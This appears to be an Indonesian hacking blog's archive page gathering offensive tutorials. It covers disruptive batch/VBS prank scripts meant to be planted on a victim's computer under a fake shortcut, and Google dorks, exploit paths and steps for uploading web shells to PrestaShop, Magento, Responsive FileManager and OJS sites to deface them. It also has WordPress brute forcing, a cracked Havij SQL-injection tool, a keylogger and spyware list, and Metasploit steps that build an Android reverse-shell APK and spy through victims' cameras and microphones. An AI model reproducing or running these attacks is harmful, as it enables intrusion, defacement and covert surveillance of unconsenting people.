Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Rabu, 28 September 2016

Hack Wifi WPA PSK


Pada kesempatan yang baik ini, saya akan kasih tips cara hack wifi di sekitar anda dengan menggunakan Jumpstart ,menggunakan software menurut saya adalah aplikasi yang paling mudah digunakan dan cepat bahakan menggunakan aplikasi ini wifi yang dilindungi WPA2 pun bisa tembus.

Namun hack wifi ini bukanlah perbuatan yang baik karena ini merupakan ilegal. Kalo ini perbuatan yang tidak baik dan ilegal mengapa kok dishare ? tujuan ngeshare cara hack wifi ini adalah hanya untuk sebatas pengetahuan cara hack wifi yang lebih cepat dan simpel.Anda bisa download softwarenya langsung dibawah ini

Software / aplikasi hack wifi yang dibutuhkan ada 3

  1. WinPcap ( untuk mendapatkan PIN dari wifi yang akan di hack)
  2. Jump Start (Untuk mencocokkan PIN dengan kode algoritma dalam tool ini)
  3. Dumpper (Software yang digunakan)


>Tutorial Video<

Semoga Bermanfaat :D
Dikutip dari :
http://www.tkj-unsur.ga/2016/01/wifi-hacker.html <Angga Mahendra>
Read more

Senin, 05 September 2016

Tutorial aplikasi penambah follower twitter

Pada kesempatan kali ini saya akan post Tutorial Menambah Follower Twitter.
Untuk langkah-langkahnya simak dibawah ini :
1. Silahkan login ke akun twitter terlebih dahulu.
2. Lalu klik disini 
3. Pilih yang gratis aja. lihat seperti digambar.



4. Lalu sobat akan diarahkan ke-halaman seperti gambar dibawah ini.

5. Kemudian sobat akan diarahkan lagi ke-halaman sebelumnya.

6. Tunggu hingga ada peringatan seperti gambar dibawah ini.

7. Tunggu beberapa menit dan lihat follower twitter sobat.
Sampai sini follower twitter sudah bertambah.
----- ----- ----- ----- -----

Tapi belum Selesai!!!. Jika follower twitter sudah sukses bertambah dan sudah merasa cukup sobat harus mencabut aplikasinya karena jika terus dibiarkan akun twitter akan error.
caranya :
8. Masuk ke pengaturan kemudian pilih pengaturan aplikasi. lihat seperti gambar dibawah.

9. Lalu cabut aplikasi. Selesai!!!

Sekian . . .
Follow twitter admin juga yah @dwibagus98 
Read more

Tools Hacker Simple


Tools Hacker Simple widih hacker aku mah cuma lammer :D

1. Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------

start

start

start

start

start

start

start

start

start

start

start

start

-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

2. Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN

3. Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yangberwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

4. Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

------------------------------------------------------

simpan kode script yang berwarna hijau dengan nama xhack.BAT type file :All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.

5. Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis.

6. Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus.

7. Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file :All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya.

8. Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
-----------------------------------------------------------
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan diNotepad dengan nama : xhack.vbs

9. Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus.

10. Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.

oke itu saja ya gan .. heheheeh terima kasih .. atas kunjungan anda :)


Read more

Sabtu, 20 Agustus 2016

Tutorial Deface Menggunakan PrestaShop - Responsive Prestashop 1.6 Arbitrary File Upload



Dork :  


inurl:"/modules/columnadverts/"


inurl:"/modules/homepageadvertise/"


inurl:"/modules/productpageadverts/"


inurl:"/modules/simpleslideshow/"


inurl:"/modules/homepageadvertise2/"


inurl:"/modules/vtemslideshow/"



Gak VULN ? cari target lain lah :v dork nya kembanginnn ... bisa tambah in site:

Exploit :

/modules/columnadverts/uploadimage.php



/modules/homepageadvertise/uploadimage.php



/modules/productpageadverts/uploadimage.php



/modules/simpleslideshow/uploadimage.php



/modules/homepageadvertise2/uploadimage.php



/modules/vtemslideshow/uploadimage.php


csrf exploiter pretashop = http://m2d.asia/csrfpretashop/

ciri ciri vuln ada tulisan error kalo User Not Login engga vuln :D

akses shellnya = targetlu/modules/namapretashopnya/slides/namashellu.php
























Read more

Jumat, 19 Agustus 2016

Tutorial Deface Menggunakan Auto Exploit Magento 2016



Halo gengs dimalam minggu ini gw mau share tutorial deface website dengan auto exploit magento
gak usah banyak bacot langsung saja ke initinya
1. download terlebih dahulu soft/apps xampp
DOWNLOAD DISINI
2. download script auto xploit magentonya dibawah ini
DISINI
lalu simpan difolder c:/xampp/php dengan format .php
3. cari target dorking digoogle
dork:
- intext:/skin/adminhtml/default/default/
- intitle:computer inurl:account/login/ site:.com
- intitle:computer inurl:account/login/create/ site:.com
- intext:"2016" inurl:account/login site:.com
- "shirt" inurl:customer/account/login/ site:.com
- "jeans" inurl:account/login site:.com
- intitle:shop inurl:account/login/create site:.com
- intext:2016 inurl:customer/account/ site:.com- intext:magento inurl:/account/login site:.uk kembangkan lagi sendiri site bisa gonta ganti

4. buka notepad copas link /url target di notepad
5. jika sudah simpan difolder c:/xampp/php dengan format .txt
6. langsung kita eksekusi

  • buka cmd
  • ketik cd c:/xampp/php
  • ketik lagi php "nama script".php "nama daftar target dinotepad yg disimpan td".txt
  • contoh: php magento.php site.txt lalu enter
lebih jelasnya bisa lihat videonya

terima kasih atas kunjungan andaaaaa....

Read more

Jumat, 12 Agustus 2016

Tutorial Deface Menggunakan Responsive FileManager



Dork : inurl:/filemanager/ intext:”dialog.php”
           inurl:/js/filemanager/ intext:”dialog.php”
           inurl:/assets/filemanager/ intext:”dialog.php”

dork favorite gua : inurl:/assets/filemanager/ site:.com (kembangin lagi ya)

Exploit : /dialog.php

Tamper Data

Shell

Script depess (google banyak… :v)
STEP BY STEP

Kita dorking dulu guys,, contoh: kita make dork favorite gua (inurl:/assets/filemanager/ site:.com)



nah kan banyak tuh,, pilih salah satu (contoh: target gua)
nah disini kita pilih dialog.php



lalu kita pilih upload, biasanya sih ada di pojok kiri atas




eittss, jangan buru-buru, sampe sini kita gunakan Tamper Data pilih Tamper Data, lalu klik start tamper




sampe sini klik di tengah-tengah, lalu pilih shell (ingat shell harus .html)


klik Tamper, lalu edit file contentnya, hapus tulisan (.html), lalu klik OK.



Upload shell selesai

Sekarang kita akses shell yang tadi di upload, caranya klik Return to files list, kemudian kita cari shell kita, klik kanan pilih show URL, lalu copy link’a. nah disitu shell kita berada.




Tadaaaaaa,,, berhasil berhasil berhasil hore


Terima Kasih Atas Kunjungan Andaa ...

Spesial Thanks To : https://www.facebook.com/herp144
Read more

Kamis, 11 Agustus 2016

Tutorial Deface Menggunakan OJS ( Open Journal System )



dork : inurl:"/index.php/index/user/register/"

targetlu/files/journals/1/articles/nopertama/submission/original/shell.phtml

oke assalamualaikum .. bertemu lagi dengan ane DiffMuRis :v langsung aja yak gimana caranya Deface Menggunakan Open Journal Systems ?

caranya langsung aja di simak videonya 

itu udah dapet targetnya .. :*

dork ? ntar ane taro di blog .. :*

masukin aja email lu...

country mah asal aja :v 

ceklis smuaaaa... 

upload shellnya .phtml yaa rename dlu okaay jadi : shellu.phtml

nah itu shell :v

udah selesai :) gampang kan :) oke sekian dari ane assalamualaikum.. :v 





Read more

Rabu, 10 Agustus 2016

Tutorial Wordpress Brute Force


assalamualaikumm.. ane mau share nih gimana caranya Wordpress Brute Force ? langsung aja di simik video nya yaa .. 

dork : inurl:/wp-login.php 




user : diffa
pass : diffapengenganteng

Spesial Thanks To : https://www.facebook.com/Abrasax1337

Read more

Rabu, 22 Juni 2016

DDos ( Distributed Denial of Service )



DDos adalah Penolakan Layanan secara Terdistribusi (bahasa Inggris: Distributed Denial of Service (
DDos) adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
  • Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
  • Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
  • Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.
Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

DDos <
Read more

Senin, 20 Juni 2016

Havij Pro 1.17 Free Full Version Download 2016












 Havij Pro 1.17 Version Free Full latest crack Download. Many of you guys are looking for Latest Havij Pro 1.17 Version Full Download. So i have uploaded a crack for Havij Pro 1.17 Version Full Free Download. So that you can use it freely :)Download Havij Pro 1.17 Full Free / Havij 1.17 Pro Full Version Download Havij 1.17 Pro Full Download - Exploit SQL Injection Attack Tool!
Havij  is an automated SQL Injection Tool That Helps Penetration. Testers To Find and Exploit SQL Injection Vulnerabilities On a Web Page...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.



Havij Pro 1.17 Version Full Download


DOWNLOAD :









It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.

The power of Havij That Makes it different from similar tools is its injection methods. The success rate is more than 95% at injections vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Features of Havij Pro 1.17 Full Version Free
  •     HTTPS support
  •     Add MSSQL Blind
  •     MSAccess more Blind (commercial version only)
  •     PostgreSQL added (only commercial version)
  •     Check for more updates.
  •     User manual query with additional results. (Only the commercial                 version)
  •     First line on the first request (all in one request), plus (commercial             version only)
  •     Dumping the data to a file is added (only commercial version)
  •     Data stored in XML format added (only commercial version)
  •     Inject the target with an increase in port (the default http port is 80)           (only commercial version)
  •     XSS bug in saved reports fixed.
  •     Remove log added.
  •     Apply button is added to the set makes it possible to change the settings     at any time (only commercial version)         
  •     Keyword testing and repair methods are added.
  •     Find a sequence of computed columns and optimized for better injection     and database to detect.
  •     Find the number of columns and column wires for the better.
  •     “414 Request URI too long” error fixed.
  •     New method to get the table and column in MSSQL further.
  •     An in MSAccess injection when syntax errors are fixed manually defined.
  •     Active XP_Exec add cmdshell (only commercial version)
  •     Active OS_Ex add cmdshell (only commercial version)
  •     Remote desktop-Enable added to cmdshell (only commercial version)
  •     Confusing MySQL, MSSQL 2005, when they found that the number of         fixed columns.
  •     Broken MD5-cracker site removed.
  •     Bug in MSSQL error detection is not fixed.
  •     An error in the error column MSSQL is not fixed.
  •     Bug in injecting into access database fixed.
  •     Bug fixed in the data in MSSQL.
  •     Find an error in mssql fixed.
  •     Bug in detecting database type when the number of fixed columns.
  •     Bug in MSSQL error syntactic fixed and executation manually.


:)

Read more

Minggu, 19 Juni 2016

11 Aplikasi Software Hacker Yang Terkenal di Dunia


1. Active password Changer

Dengan tools ini, Anda bisa mengubah passaword yang ada di dalam komputer yang bisa anda akses secara fisik. Tool ini bekerja dengan cukup baik. Ada beberapa fitur yang dimilikinya, yaitu melakukan booting dari USB, Floopy disk, ataupun melalui CD. Bahkan tool ini juga menyediakan CD Burner sederhana untuk mem-burn file pada CD.

2. Cain

Ini adalah salah satu tool yang sangat popular dikalangan para Hacker. Aplikasi ini dikenal sebagai aplikasi serba bisa, bukan hanya saja digunakan untuk melakukan kracking password, fitur-fitur lainnya juga bisa didapatkan di sini, seperti MITM. Aplikasi ini memungkinkan agan-agan untuk memperoleh nilai hash dari berbagai sumber.

3.dumpacl-dumpsec

Tools yang digunakan untuk melakukan pekerjaan enumerasi. Dulu, aplikasi ini bernama Dump ACL. Cara kerjanya memanfaatkan Null Connections, sehingga tools ini mampu menampilkan user account secara detail. Contohnya seperti kapan terakhir pergantian atau perubahan password, administratornya siapa dan kapan expirednya dan sebagainya

4.Handy-keylogger

Sama seperti keylogger yang lain, ia juga bisa menyembunyikan dirinya jika dideteksi dari Task Manager. Keylogger ini diam-diam mencatat seluruh kegiatan agan pada PC yang sudah diinstal aplikasi ini. Seperti ketikan keyboard, clipboard, snapshot, dan alamat website yang dikunjungi semua bisa direkam dengan baik menggunakan aplikasi ini.

5. L0phtkrack Administrato

Dengan aplikasi ini , agan bisa mengimmpor nilai hash dari computer lain dengan menggunkan salah satu fitur yang dimilikinya yaitu import hashes. Namun agan skalian masih harus memiliki user account yang setara dengan administrator. Jika agan ingin mengambil nilai hash secara remote.


6. privacy keyboard
Aplikasi tool ni berguna untuk mencegah keylogger yang menyakiti sistem agan skalian. Baik itu keylogger yang bekerja secara hardware maupun software. Jika aplikasi ini aktif Anda tidak bisa melakukan kegiatan capture screen shoots, keystroke. Untuk keylogger berjenis hardware, aplikasi ini menyediakan keyboard virtual, sehingga tidak akan terdeteksi.


7. Spytech Spy Agent


Aplikasi mata-mata ini akan mencatat semua informasi yang dilakukan oleh user secara diam-diam. File logyang digunakan untuk menyimpan hasil pencatatan akan di enkripsi. Secara default, hotkey untuk menjalaknnya aplikasi ini adalah Ctrl+Shift+Alt+M, namun defalt hotkey ini masih bisa anda ubah sesuai dengan keinginan Agan-agan sekalian8.winfingerprint-0.6.2

Aplikasi ini menggambungkan banyak teknik enumerasi. Di aplikasi ini anda bisa menjumpai enumerasi melalui Net BIOS, SMB, MSRPC, SNMP, dan Active Directory. Anda tinggal memasukkan alamat IP dari host yang hendak periksa dan pilih tombol scan untuk mulai melakukan scanning. Setelah itu, terserah agan-agan mau diapain tuhkomputr remote tersebut.9. Sams Big Play Maker
Aplikasi yang satu ini cukup unik karena mampu menyembunyikan teks atau pesan tersembunyi yang anda masukkan menjadi layaknya bentuk percakapan. Biasa mereka tidak akan menyadari bahwa sesungguhnya ada pesan tersembunyi di dalamnya.


10. Track eraser Pro

Dalam urusan menghapus jejak, aplikasi ini memang sangat bisa diandalkan, karena ia mendukung banyak sekali jenis aplikasi. Selain bisa menhapus log yang dicatat oleh Windows, aplikasi ini akan menghapus jejak pada aplikasi Office, realone player, media player, winzip, winamp, dan sebagainya. Dijamin gan-agan tidak akan meninggalkan jejak di PC lain.

11. Actual Spy
Aplikasi ini memilki fitur pencatatan yang cukup lengkap. Key stokes, screen shots, aplikasi yang dijalankan atau ditutup, informasi clipboard saat melakukan copy-paste dokumen yang dicetak dan segala macamnya, dicatat pada masing-masing tabulasi. File log akan dienkripsi sehinggga hanya orang tertentu saja yang bisa melihatnya dan memilih aplikasi diinginkannya.







Read more

Selasa, 16 Februari 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit




You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:


Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16 (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit


When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.



Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4



Take photos using the devices cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2


Any Issue or thing you dont understand feel free to comment below ... Thanks 




Read more

Kamis, 11 Februari 2016

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)

How to hack WebCam using Metasploit(Kali Linux/ Backtrack)





{How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). So today we are going to learn about How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). I will teach you how you guys can easily Hack WebCam using Metasploit(Kali Linux/ Backtrack). All you need is linux based OS and Metasploit.



Requirements:

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)


How to Hack WebCam using Metasploit(Kali Linux/ Backtrack). Our main reason for this tutorial is to indicate exactly how simple it is, so you will take better mindfulness that it is possible, and take security and protect yourself. So lets get started: How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)


Open Metasploit And write the following commands step by step :)
  • msf> show exploits
  • msf> use windows/browser/adobe_cooltype_sing
  • msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
  • payload=> windows/meterpreter/reverse_tcp
  • msf exploit(adobe_cooltype_sing) > show options

    Windows Platform Testing

  • msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
  • SRVHOST => 192.168.0.58
  • msf exploit(adobe_cooltype_sing) > set SRVPORT 80
  • SRVPORT => 80
  • msf exploit(adobe_cooltype_sing) > set uripath /
  • uripath => /
  • msf exploit(adobe_cooltype_sing) > set uripath /
  • uripath => /
  • msf exploit(adobe_cooltype_sing) >exploit -j
  • Let the victim open your IP in their (his/her)  browser and when it will be opened, you will get 1 meterpreter session.
  • msf exploit(adobe_cooltype_sing) > session -i 1
  • meterpreter> run webcam  
  • And you will get access to the webcam of the targeted victim .
  • Congratulations you did it :D !!

How to Hack WebCam using Metasploit(Kali Linux/ Backtrack)






I hope you got everything. My next tutorial will be about Using Metasploit to Hack an Android Phone. STAY CONNECTED ;)

If you have any queries fell free to comment below.


Read more